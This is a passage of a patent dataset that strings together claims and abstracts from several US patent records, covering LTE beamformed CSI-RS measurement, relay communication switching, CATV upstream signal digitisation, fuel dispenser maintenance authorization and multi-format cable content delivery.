receive first higher layer signaling that indicates one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements), wherein the plurality of REs comprises a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); receive second higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs; receive beamformed CSI-RS via the subset of the plurality of REs; measure one or more CSI parameters based on the received beamformed CSI-RS; and output a CSI report that indicates the measured one or more CSI parameters. 46. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset of the plurality of REs comprises one RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each N continuous PRBs of the plurality of continuous PRBs (physical resource blocks). 47. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency shift that indicates one or more PRBs of the plurality of continuous PRBs, wherein the indicated one or more PRBs comprise the subset of the plurality of REs. 48. The machine readable medium of claim 45, wherein the one or more parameters comprise a first frequency shift and a second frequency shift, wherein the first frequency shift indicates a first set of PRBs of the plurality of continuous PRBs and the second frequency shift indicates a second set of PRBs of the plurality of continuous PRBs, wherein the first set of PRBs comprise REs of the subset of the plurality of REs for a first subset of the one or more CSI-RS APs, and wherein the second set of PRBs comprise REs of the subset of the plurality of REs for a second subset of the one or more CSI-RS APs. | Techniques for measuring CSI (Channel State Information) based on beamformed CSI-RS having reduced overhead are discussed. One example embodiment configured to be employed in a UE (User Equipment) comprises a memory; and one or more processors configured to: process higher layer signaling indicating one or more CSI-RS resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission; decode one or more CSI-RSs from the indicated subset; and measure one or more CSI parameters based on the decoded one or more CSI-RSs.1-24. (canceled) 25. An apparatus configured to be employed in a User Equipment (UE), comprising:
a memory; and one or more processors configured to:
process higher layer signaling indicating one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements) comprising a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks);
process additional higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs associated with a beamformed CSI-RS transmission;
decode one or more CSI-RSs from the indicated subset; and
measure one or more CSI parameters based on the decoded one or more CSI-RSs. 26. The apparatus of claim 25, wherein the one or more CSI-RS parameters comprises a frequency decimation factor equal to N, wherein N is an integer greater than 1, wherein the subset comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 27. The apparatus of claim 26, wherein the one or more CSI-RS parameters comprises one or more frequency shifts, wherein each frequency shift of the one or more frequency shifts is associated with at least one of the one or more CSI-RS APs. 28. The apparatus of claim 27, wherein the one or more frequency shifts comprises a common frequency shift associated with each of the one or more CSI-RS APs, wherein each set of N continuous PRBs comprises a single PRB that comprises the RE for each CSI-RS resource for each of the one or more CSI-RS APs in that set of N continuous PRBs, and wherein the one or more processors are further configured to determine the single PRB of each set of N continuous PRBs based on the common frequency shift. 29. The apparatus of claim 27, wherein the one or more frequency shifts comprises a first frequency shift associated with a first set of CSI-RS APs of the one or more CSI-RS APs, and a distinct second frequency shift associated with a distinct second set of CSI-RS APs of the one or more CSI-RS APs. 30. The apparatus of claim 25, wherein the one or more CSI-RS parameters indicate the subset of the plurality of REs via a resource allocation indicating a subset of the plurality of continuous PRBs. 31. The apparatus of claim 25, wherein the additional higher layer signaling indicates at least one of a time measurement restriction or a frequency measurement restriction, and wherein the one or more processors are configured to measure the one or more CSI parameters based on the at least one of the time measurement restriction or the frequency measurement restriction. 32. The apparatus of claim 25, wherein the subset of the plurality of REs is time-dependent. 33. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a modulo base N of a CSI-RS transmission instance, wherein N is a frequency decimation factor indicated via the additional higher layer signaling. 34. The apparatus of claim 32, wherein the subset of the plurality of REs is based on a pseudo-random sequence. 35. The apparatus of claim 34, wherein the pseudo-random sequence is based on an initialization seed indicated via RRC (Radio Resource Control) signaling. 36. The apparatus of claim 25, wherein the one or more CSI-RS APs comprises one, two, four, or eight CSI-RS APs. 37. An apparatus configured to be employed in an Evolved NodeB (eNB), comprising:
a memory; and one or more processors configured to:
generate a first set of higher layer signaling that configures at least one CSI (Channel State Information)-RS (Reference Signal) resource for a UE, wherein the at least one CSI-RS resource is associated with a plurality of REs (Resource Elements) over a plurality of continuous PRBs (physical resource blocks), and wherein each CSI-RS resource is associated with a CSI-RS pattern comprising a distinct RE for each of one or more CSI-RS APs (Antenna Ports) in each PRB of the plurality of continuous PRBs;
generate a second set of higher layer signaling that indicates a subset of the plurality of REs for a beamformed CSI-RS transmission;
encode a set of beamformed CSI-RS; and
map the set of beamformed CSI-RS to the subset of the plurality of REs. 38. The apparatus of claim 37, wherein the second set of higher layer signaling comprises a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset comprises, for each CSI-RS resource, one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs of the plurality of continuous PRBs. 39. The apparatus of claim 38, wherein the second set of higher layer signaling indicates a frequency shift that indicates a single PRB of each set of N continuous PRBs comprises the one RE for each of the one or more CSI-RS APs in each set of N continuous PRBs, and wherein the one or more processors are configured to map the set of beamformed CSI-RS to the single PRB of each set of N continuous PRBs based on the CSI-RS pattern associated with each CSI-RS resource. 40. The apparatus of claim 38, wherein the second set of higher layer signaling indicates at least a first frequency shift and a distinct second frequency shift, wherein the first frequency shift is associated with a first subset of the one or more CSI-RS APs, and wherein the second frequency shift is associated with a distinct second subset of the one or more CSI-RS APs. 41. The apparatus of claim 40, wherein each set of N continuous PRBs comprises a first PRB comprising the one RE for each CSI-RS APs of the first subset of the one or more CSI-RS APs, and comprises a distinct second PRB comprising the one RE for each CSI-RS APs of the distinct second subset of the one or more CSI-RS APs. 42. The apparatus of claim 37, wherein the subset is based at least in part on a CSI-RS transmission instance associated with the set of beamformed CSI-RS. 43. The apparatus of claim 37, wherein the second set of higher layer signaling indicates the subset of the plurality of REs via a resource allocation indicating one or more PRBs of the plurality of continuous PRBs. 44. The apparatus of claim 43, wherein the resource allocation indicates the one or more PRBs of the plurality of continuous PRBs via a bitmap. 45. A non-transitory machine readable medium comprising instructions that, when executed, cause a User Equipment (UE) to:
receive first higher layer signaling that indicates one or more CSI (Channel State Information)-RS (Reference Signal) resources associated with a plurality of REs (Resource Elements), wherein the plurality of REs comprises a RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each of a plurality of continuous PRBs (physical resource blocks); receive second higher layer signaling comprising one or more CSI-RS parameters that indicate a subset of the plurality of REs; receive beamformed CSI-RS via the subset of the plurality of REs; measure one or more CSI parameters based on the received beamformed CSI-RS; and output a CSI report that indicates the measured one or more CSI parameters. 46. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency decimation factor, N, wherein N is an integer greater than 1, wherein the subset of the plurality of REs comprises one RE for each CSI-RS resource for each of one or more CSI-RS APs (Antenna Ports) in each N continuous PRBs of the plurality of continuous PRBs (physical resource blocks). 47. The machine readable medium of claim 45, wherein the one or more parameters comprise a frequency shift that indicates one or more PRBs of the plurality of continuous PRBs, wherein the indicated one or more PRBs comprise the subset of the plurality of REs. 48. The machine readable medium of claim 45, wherein the one or more parameters comprise a first frequency shift and a second frequency shift, wherein the first frequency shift indicates a first set of PRBs of the plurality of continuous PRBs and the second frequency shift indicates a second set of PRBs of the plurality of continuous PRBs, wherein the first set of PRBs comprise REs of the subset of the plurality of REs for a first subset of the one or more CSI-RS APs, and wherein the second set of PRBs comprise REs of the subset of the plurality of REs for a second subset of the one or more CSI-RS APs. | 2,400 |
9,110 | 9,110 | 15,128,568 | 2,469 | A server device or a terminal device can perform switching of a path or a communication channel between an infrastructure communication through a network such as an EPC, and a Relay communication through a direct communication with a Relay UE, and can continuously provide a service. A routing information request message includes at least identification information indicating that switching of a communication is required. A third terminal device having a relay function is selected based on the routing information request message. A routing update instruction message which is a response to the routing information request message and includes information of the third terminal device is transmitted to the first terminal device. A direct communication with the third terminal device is performed by using LTE, so as to perform an instruction of communicating with the first terminal device. Thus, a communication channel is switched. | 1. A server device adapted to:
receive a routing-information update request message transmitted by a second terminal device, which performs communication with a first terminal device through a core network, from the first terminal device, the routing-information update request message including at least identification information indicating that switching of a communication is required; select a third terminal device having a relay function, based on the identification information; and transmit a routing update instruction message which is a response to the routing-information update request message, and includes information of the third terminal device, to the first terminal device, and perform an instruction of performing a direct communication with the third terminal device by using LTE, so as to communicate with the first terminal device. 2. The server device according to claim 1, further adapted to:
transmit the routing update instruction message to the second terminal device, and perform an instruction of communicating with the second terminal device which performs the direct communication with the third terminal device by using LTE. 3. A server device adapted to:
lead switching between a first communication in which a communication with a first terminal device is performed through a core network of a second terminal device, and a second communication in which the second terminal device performs a direct communication with a third terminal device so as to communicate with the first terminal device; select the third terminal device having a relay function; and transmit a routing update instruction message including information of the third terminal device, to the second terminal device, and perform an instruction of switching to the second communication. 4. The server device according to claim 3, further adapted to:
transmit the routing update instruction message to the first terminal device, and perform an instruction of communicating with the second terminal device which performs a direct communication with the third terminal by using LTE. 5. A first terminal device which performs a communication with a second terminal device through a core network, the device adapted to:
transmit a routing-information update request message including at least identification information, to a server device by detecting a trigger of switching of a path, the identification information indicating that switching of a communication is required; receive a routing update instruction message including information of a third terminal device which has been selected by the server device and has a relay function, from the server device; and perform a direct communication with the third terminal device in accordance with the routing update instruction message by using LTE, so as to communicate with the second terminal device. | A server device or a terminal device can perform switching of a path or a communication channel between an infrastructure communication through a network such as an EPC, and a Relay communication through a direct communication with a Relay UE, and can continuously provide a service. A routing information request message includes at least identification information indicating that switching of a communication is required. A third terminal device having a relay function is selected based on the routing information request message. A routing update instruction message which is a response to the routing information request message and includes information of the third terminal device is transmitted to the first terminal device. A direct communication with the third terminal device is performed by using LTE, so as to perform an instruction of communicating with the first terminal device. Thus, a communication channel is switched.1. A server device adapted to:
receive a routing-information update request message transmitted by a second terminal device, which performs communication with a first terminal device through a core network, from the first terminal device, the routing-information update request message including at least identification information indicating that switching of a communication is required; select a third terminal device having a relay function, based on the identification information; and transmit a routing update instruction message which is a response to the routing-information update request message, and includes information of the third terminal device, to the first terminal device, and perform an instruction of performing a direct communication with the third terminal device by using LTE, so as to communicate with the first terminal device. 2. The server device according to claim 1, further adapted to:
transmit the routing update instruction message to the second terminal device, and perform an instruction of communicating with the second terminal device which performs the direct communication with the third terminal device by using LTE. 3. A server device adapted to:
lead switching between a first communication in which a communication with a first terminal device is performed through a core network of a second terminal device, and a second communication in which the second terminal device performs a direct communication with a third terminal device so as to communicate with the first terminal device; select the third terminal device having a relay function; and transmit a routing update instruction message including information of the third terminal device, to the second terminal device, and perform an instruction of switching to the second communication. 4. The server device according to claim 3, further adapted to:
transmit the routing update instruction message to the first terminal device, and perform an instruction of communicating with the second terminal device which performs a direct communication with the third terminal by using LTE. 5. A first terminal device which performs a communication with a second terminal device through a core network, the device adapted to:
transmit a routing-information update request message including at least identification information, to a server device by detecting a trigger of switching of a path, the identification information indicating that switching of a communication is required; receive a routing update instruction message including information of a third terminal device which has been selected by the server device and has a relay function, from the server device; and perform a direct communication with the third terminal device in accordance with the routing update instruction message by using LTE, so as to communicate with the second terminal device. | 2,400 |
9,111 | 9,111 | 15,486,422 | 2,426 | Methods and systems capable of improving the transmission of data along an upstream path of a Hybrid Fiber-Coaxial Cable Network, from a transmitter in a node to a receiver in a Cable Modem Termination System. | 1. A method for sending a signal on an upstream path in a CATV network, the method comprising:
receiving an input electrical signal comprising upstream data from at least one cable modem of a CATV consumer, the input signal associated with a continuous spectrum within which all the upstream data occupies; sampling and digitizing only a selective portion of the continuous spectrum of the input electrical signal at the full Nyquist rate; converting the digitized signal to an optical signal; and sending the optical signal to a CMTS in a head end of the CATV network. 2. The method of claim 1 where the signal on an upstream path is sent at a throughput exceeding 1 Gbps. 3. The method of claim 1 where the signal on an upstream path is sent at 1024 QAM. 4. The method of claim 1 where portions of the continuous spectrum representing a guardband are not sampled and digitized. 5. The method of claim 1 where the input electrical signal is split into a first portion comprising a lower part of the continuous spectrum and a second portion comprising an upper portion of the continuous spectrum. 6. The method of claim 5 where each of the first and second portions are approximately 96 MHz in width. 7. The method of claim 5 where each of the first and second portions are approximately 85 MHz in width. 8. The method of claim 5 where the upper portion is bandpass filtered. 9. The method of claim 5 where the lower portion is not bandpass sampled and the upper portion is bandpass sampled. 10. The method of claim 5 including amplifying both the upper portion and the lower portion. | Methods and systems capable of improving the transmission of data along an upstream path of a Hybrid Fiber-Coaxial Cable Network, from a transmitter in a node to a receiver in a Cable Modem Termination System.1. A method for sending a signal on an upstream path in a CATV network, the method comprising:
receiving an input electrical signal comprising upstream data from at least one cable modem of a CATV consumer, the input signal associated with a continuous spectrum within which all the upstream data occupies; sampling and digitizing only a selective portion of the continuous spectrum of the input electrical signal at the full Nyquist rate; converting the digitized signal to an optical signal; and sending the optical signal to a CMTS in a head end of the CATV network. 2. The method of claim 1 where the signal on an upstream path is sent at a throughput exceeding 1 Gbps. 3. The method of claim 1 where the signal on an upstream path is sent at 1024 QAM. 4. The method of claim 1 where portions of the continuous spectrum representing a guardband are not sampled and digitized. 5. The method of claim 1 where the input electrical signal is split into a first portion comprising a lower part of the continuous spectrum and a second portion comprising an upper portion of the continuous spectrum. 6. The method of claim 5 where each of the first and second portions are approximately 96 MHz in width. 7. The method of claim 5 where each of the first and second portions are approximately 85 MHz in width. 8. The method of claim 5 where the upper portion is bandpass filtered. 9. The method of claim 5 where the lower portion is not bandpass sampled and the upper portion is bandpass sampled. 10. The method of claim 5 including amplifying both the upper portion and the lower portion. | 2,400 |
9,112 | 9,112 | 15,801,947 | 2,434 | Systems and methods are provided for controlling maintenance of a fuel dispenser. In one exemplary embodiment, a system is provided having a fuel dispenser that includes an electronics module having a data processor, a remote enterprise server in communication with the electronics module, and a remote code processor in communication with the remote enterprise server. The data processor is configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password that is generated by the remote code processor based on the fuel dispenser data, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode. | 1. A system for controlling maintenance of a fuel dispenser, comprising:
a fuel dispenser comprising a housing having fuel dispensing components disposed therein and an electronics module disposed at least partially therein, the electronics module including a data processor configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode; a remote enterprise server in communication with the electronics module, the remote enterprise server being configured to prompt the electronics module for the fuel dispensing data and to receive the fuel dispensing data, and to provide the remote password to the electronics module of the fuel dispenser; and a remote code processor in communication with the enterprise server, the remote code processor being configured to receive the fuel dispensing data from the enterprise server, to determine the remote password based on the received data, and to provide the remote password to the enterprise server. 2. The system of claim 1, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the electronics module. 3. The system of claim 1, wherein the remote enterprise server receives a command from an external source to request that the electronics module provide the fuel dispenser data. 4. The system of claim 3, wherein the electronics module provides different fuel dispenser data for each request received. 5. The system of claim 1, wherein the electronics module is adapted to prevent the fuel dispenser from entering maintenance mode prior to the data processor determining that the remote password matches the authorization password. 6. The system of claim 1, wherein the electronics module is adapted to receive a request and to cause the fuel dispenser to exit the maintenance mode. 7. The system of claim 1, wherein the enterprise server is configured to prompt the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 8. The system of claim 1, wherein the remote enterprise server is configured to transmit instructions to the electronics module to cause the electronics module to perform at least one maintenance operation on the fuel dispenser during the maintenance mode. 9. A processing system, comprising:
a data processing unit configured to be at least partially housed in a fuel dispenser and configured to generate and transmit data characterizing the fuel dispenser and to determine an authorization password based on the fuel dispenser data; a remote enterprise server configured to receive a command to prompt the data processing unit to provide the fuel dispenser data and configured to transmit a request to the data processing unit for the fuel dispenser data and to receive the fuel dispenser data; and a remote code processor configured to receive the fuel dispenser data from the enterprise server, calculate a remote password based on the received fuel dispenser data, and provide the remote password to the enterprise server; wherein the enterprise server is configured to receive the remote password and provide the remote password to the data processing unit; and wherein the data processing unit is configured to determine whether the remote password matches the authorization password. 10. The system of claim 9, wherein the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode if the remote password matches the authorization password. 11. The system of claim 9, wherein, when the data processing unit determines that the remote password matches the authorization password, the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode. 12. The system of claim 9, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the data processing unit. 13. The system of claim 9, wherein the data processing unit is configured to provide different fuel dispenser data for each request received. 14. The system of claim 9, wherein the data processing unit is configured to prevent a fuel dispenser from entering a maintenance mode prior to the data processor determining that the remote password matches the authorization password. 15. The system of claim 9, wherein the data processing unit is configured to receive a request and to cause a fuel dispenser to exit the maintenance mode. 16. The system of claim 9, wherein the remote enterprise server is configured to transmit instructions to the data processing unit to cause the data processing unit to perform at least one maintenance operation on a fuel dispenser during the maintenance mode. 17. A method for prompting a maintenance mode of a fuel dispenser, the method comprising:
calculating, by an electronics module comprising a data processor and that is at least partially housed in a fuel dispenser, an authorization password based on data characterizing the fuel dispenser; transmitting, by the electronics module, the fuel dispenser data to an enterprise server that is in communication with the electronics module; receiving and transmitting, by the enterprise server, the fuel dispenser data to a code processor that is in communication with the enterprise server; generating and transmitting, by the code processor, a remote password based on the received fuel dispenser data to the enterprise server; receiving and transmitting, by the enterprise server, the remote password to the electronics module; determining, by the data processor, that the remote password matches the authorization password; and causing the fuel dispenser to enter the maintenance mode. 18. The method of claim 17, further comprising generating, by the electronics module, the fuel dispensing data that includes a challenge code and identity information of a central processing unit (CPU) board of the electronics module. 19. The method of claim 17, further comprising receiving, by the electronics module, data comprising a request from the enterprise server to provide the fuel dispenser data. 20. The method of claim 17, further comprising prompting, by the enterprise server, the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 21. The method of claim 17, further comprising performing one or more maintenance operations on the fuel dispenser during the maintenance mode. | Systems and methods are provided for controlling maintenance of a fuel dispenser. In one exemplary embodiment, a system is provided having a fuel dispenser that includes an electronics module having a data processor, a remote enterprise server in communication with the electronics module, and a remote code processor in communication with the remote enterprise server. The data processor is configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password that is generated by the remote code processor based on the fuel dispenser data, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode.1. A system for controlling maintenance of a fuel dispenser, comprising:
a fuel dispenser comprising a housing having fuel dispensing components disposed therein and an electronics module disposed at least partially therein, the electronics module including a data processor configured to determine an authorization password based on data characterizing the fuel dispenser, to receive a remote password, to determine that the remote password matches the authorization password, and to cause the fuel dispenser to enter a maintenance mode; a remote enterprise server in communication with the electronics module, the remote enterprise server being configured to prompt the electronics module for the fuel dispensing data and to receive the fuel dispensing data, and to provide the remote password to the electronics module of the fuel dispenser; and a remote code processor in communication with the enterprise server, the remote code processor being configured to receive the fuel dispensing data from the enterprise server, to determine the remote password based on the received data, and to provide the remote password to the enterprise server. 2. The system of claim 1, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the electronics module. 3. The system of claim 1, wherein the remote enterprise server receives a command from an external source to request that the electronics module provide the fuel dispenser data. 4. The system of claim 3, wherein the electronics module provides different fuel dispenser data for each request received. 5. The system of claim 1, wherein the electronics module is adapted to prevent the fuel dispenser from entering maintenance mode prior to the data processor determining that the remote password matches the authorization password. 6. The system of claim 1, wherein the electronics module is adapted to receive a request and to cause the fuel dispenser to exit the maintenance mode. 7. The system of claim 1, wherein the enterprise server is configured to prompt the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 8. The system of claim 1, wherein the remote enterprise server is configured to transmit instructions to the electronics module to cause the electronics module to perform at least one maintenance operation on the fuel dispenser during the maintenance mode. 9. A processing system, comprising:
a data processing unit configured to be at least partially housed in a fuel dispenser and configured to generate and transmit data characterizing the fuel dispenser and to determine an authorization password based on the fuel dispenser data; a remote enterprise server configured to receive a command to prompt the data processing unit to provide the fuel dispenser data and configured to transmit a request to the data processing unit for the fuel dispenser data and to receive the fuel dispenser data; and a remote code processor configured to receive the fuel dispenser data from the enterprise server, calculate a remote password based on the received fuel dispenser data, and provide the remote password to the enterprise server; wherein the enterprise server is configured to receive the remote password and provide the remote password to the data processing unit; and wherein the data processing unit is configured to determine whether the remote password matches the authorization password. 10. The system of claim 9, wherein the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode if the remote password matches the authorization password. 11. The system of claim 9, wherein, when the data processing unit determines that the remote password matches the authorization password, the data processing unit is configured to cause the fuel dispenser to enter a maintenance mode. 12. The system of claim 9, wherein the fuel dispenser data comprises a challenge code and identity information of a central processing unit (CPU) of the data processing unit. 13. The system of claim 9, wherein the data processing unit is configured to provide different fuel dispenser data for each request received. 14. The system of claim 9, wherein the data processing unit is configured to prevent a fuel dispenser from entering a maintenance mode prior to the data processor determining that the remote password matches the authorization password. 15. The system of claim 9, wherein the data processing unit is configured to receive a request and to cause a fuel dispenser to exit the maintenance mode. 16. The system of claim 9, wherein the remote enterprise server is configured to transmit instructions to the data processing unit to cause the data processing unit to perform at least one maintenance operation on a fuel dispenser during the maintenance mode. 17. A method for prompting a maintenance mode of a fuel dispenser, the method comprising:
calculating, by an electronics module comprising a data processor and that is at least partially housed in a fuel dispenser, an authorization password based on data characterizing the fuel dispenser; transmitting, by the electronics module, the fuel dispenser data to an enterprise server that is in communication with the electronics module; receiving and transmitting, by the enterprise server, the fuel dispenser data to a code processor that is in communication with the enterprise server; generating and transmitting, by the code processor, a remote password based on the received fuel dispenser data to the enterprise server; receiving and transmitting, by the enterprise server, the remote password to the electronics module; determining, by the data processor, that the remote password matches the authorization password; and causing the fuel dispenser to enter the maintenance mode. 18. The method of claim 17, further comprising generating, by the electronics module, the fuel dispensing data that includes a challenge code and identity information of a central processing unit (CPU) board of the electronics module. 19. The method of claim 17, further comprising receiving, by the electronics module, data comprising a request from the enterprise server to provide the fuel dispenser data. 20. The method of claim 17, further comprising prompting, by the enterprise server, the fuel dispenser for the fuel dispensing data at the expiration of a predetermined time period. 21. The method of claim 17, further comprising performing one or more maintenance operations on the fuel dispenser during the maintenance mode. | 2,400 |
9,113 | 9,113 | 15,417,783 | 2,426 | A content delivery resource in a cable network receives a request for specified content. The content delivery resource retrieves profile information assigned to the subscriber domain. The profile information indicates multiple different playback formats assigned to the subscriber domain. To service the request, the content delivery resource utilizes the profile information associated with the subscriber domain to select versions of the specified content encoded in accordance with the multiple different playback formats. The content delivery resource then initiates transmission of the versions of the specified content in the multiple different playback formats to the subscriber domain for playback on multiple types of playback devices. | 1. A method comprising:
via computer processor hardware, executing operations of:
receiving a request for content, the request originated from a first playback device operated in a subscriber domain;
identifying multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmitting versions of the content encoded in accordance with the multiple different playback formats to the subscriber domain. 2. The method as in claim 1, wherein identifying the multiple different playback formats includes:
identifying a first playback format assigned to the first playback device; and identifying a second playback format assigned to a second playback device operated of the multiple playback devices operated in the subscriber domain. 3. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmitting a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 4. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format to a repository in the subscriber domain; and
ii) transmitting a second version of the specified content encoded in accordance with the second playback format to the repository, the repository accessible by the first playback device and the second playback device. 5. The method as in claim 1, wherein identifying the multiple different playback formats includes:
mapping the first playback device to a first playback format; identifying a second playback format assigned to a second playback device operated in the subscriber domain. 6. The method as in claim 1 further comprising:
providing a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 7. The method as in claim 1, wherein the multiple different playback formats includes a first playback format and a second playback format, the method further comprising:
responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 8. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 9. The method as in claim 1, wherein transmitting the versions of the requested content includes:
controlling channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmitting a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmitting a second encoded version of the requested content to the subscriber domain over the second channel. 10. The method as in claim 3, wherein the subscriber domain is a first subscriber domain of the multiple subscriber domains;
wherein the first channel supports a predetermined bandwidth; and wherein the second channel supports a varying amount of bandwidth. 11. The method as in claim 1 further comprising:
streaming a first version of the content over a broadcast channel of a shared cable network to a repository in the subscriber domain, the first version of the content encoded for playback by a first playback device in the subscriber domain;
providing notification to a second playback device in the subscriber domain that the content has been requested for retrieval;
detecting input provided from the second playback device to stream a second version of the specified content directly to the second playback device; and
initiating transmission of the second version of the specified content over a portion of bandwidth of the shared cable network dedicated to transmission of IP (Internet Protocol) data traffic. 12. The method as in claim 11 further comprising:
to satisfy the request, streaming a first version of the content and a second version of the content over a shared communication link to a repository in the subscriber domain, the first version and second version of content transmitted over bandwidth of the shared communication link supporting QAM modulation, the first version of the content encoded for playback by a first playback device in the subscriber domain, the second version of the content encoded for playback by a second playback device in the subscriber domain. 13. A computer system comprising:
computer processor hardware; and a hardware storage resource coupled to the computer processor hardware, the hardware storage resource storing instructions that, when executed by the at computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain;
identify multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. 14. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
identify a first playback format assigned to the first playback device; and identify a second playback format assigned to a second playback device of the multiple playback devices operated in the subscriber domain. 15. The computer system as in claim 14, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
to satisfy the request for content:
i) transmit a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmit a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 16. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
map the first playback device to a first playback format; identify a second playback format assigned to a second playback device operated in the subscriber domain. 17. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
provide a notification to a user of the first playback device, the notification querying the user whether to transmit the requested content in a format supported by a second playback device in the subscriber domain. 18. The computer system as in claim 13, wherein the multiple different playback formats includes a first playback format and a second playback format; and
wherein the instructions executed by the computer processor hardware cause the computer processor hardware to: responsive to the request, streaming the requested content in the first encoding format in accordance with a first playback bit rate and streaming the requested content in the second encoding format in accordance with a second playback bit rate, the second playback bit rate different than the first playback bit rate. 19. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control delivery of communications to multiple subscriber domains over a shared communication link including DOCSIS (Data Over Cable Service Interface Specification) channels and non-DOCSIS channels, the shared communication link conveying a first version of the requested content to the subscriber domain over a DOCSIS channel, the shared communication link conveying a second version of the requested content to the subscriber domain over a non-DOCSIS channel. 20. The computer system as in claim 13, wherein the instructions executed by the computer processor hardware cause the computer processor hardware to:
control channels in a shared communication link to multiple subscriber domains including the subscriber domain in which the first playback device is operated, the channels in the shared communication link including a first channel and a second channel, the method further comprising: to satisfy the request: i) transmit a first encoded version of the requested content to the subscriber domain over the first channel, and ii) transmit a second encoded version of the requested content to the subscriber domain over the second channel. 21. Computer-readable storage hardware having instructions stored thereon, the instructions, when carried out by computer processor hardware, cause the computer processor hardware to:
receive a request for content, the request originated from a first playback device operated in a subscriber domain; identify multiple different playback formats of multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and to satisfy the request, transmit versions of the specified content encoded in accordance with the multiple different playback formats to the subscriber domain. | A content delivery resource in a cable network receives a request for specified content. The content delivery resource retrieves profile information assigned to the subscriber domain. The profile information indicates multiple different playback formats assigned to the subscriber domain. To service the request, the content delivery resource utilizes the profile information associated with the subscriber domain to select versions of the specified content encoded in accordance with the multiple different playback formats. The content delivery resource then initiates transmission of the versions of the specified content in the multiple different playback formats to the subscriber domain for playback on multiple types of playback devices.1. A method comprising:
via computer processor hardware, executing operations of:
receiving a request for content, the request originated from a first playback device operated in a subscriber domain;
identifying multiple different playback formats associated with multiple devices operated in the subscriber domain, the multiple devices including the first playback device; and
to satisfy the request, transmitting versions of the content encoded in accordance with the multiple different playback formats to the subscriber domain. 2. The method as in claim 1, wherein identifying the multiple different playback formats includes:
identifying a first playback format assigned to the first playback device; and identifying a second playback format assigned to a second playback device operated of the multiple playback devices operated in the subscriber domain. 3. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format over a first channel of a shared communication link to the first playback device in the subscriber domain; and
ii) transmitting a second version of the specified content encoded in accordance with the second playback format over a second channel of the shared communication link to the second playback device in the subscriber domain. 4. The method as in claim 2 further comprising:
to satisfy the request for content:
i) transmitting a first version of the specified content encoded in accordance with the first playback format to a repository in the subscriber domain; and
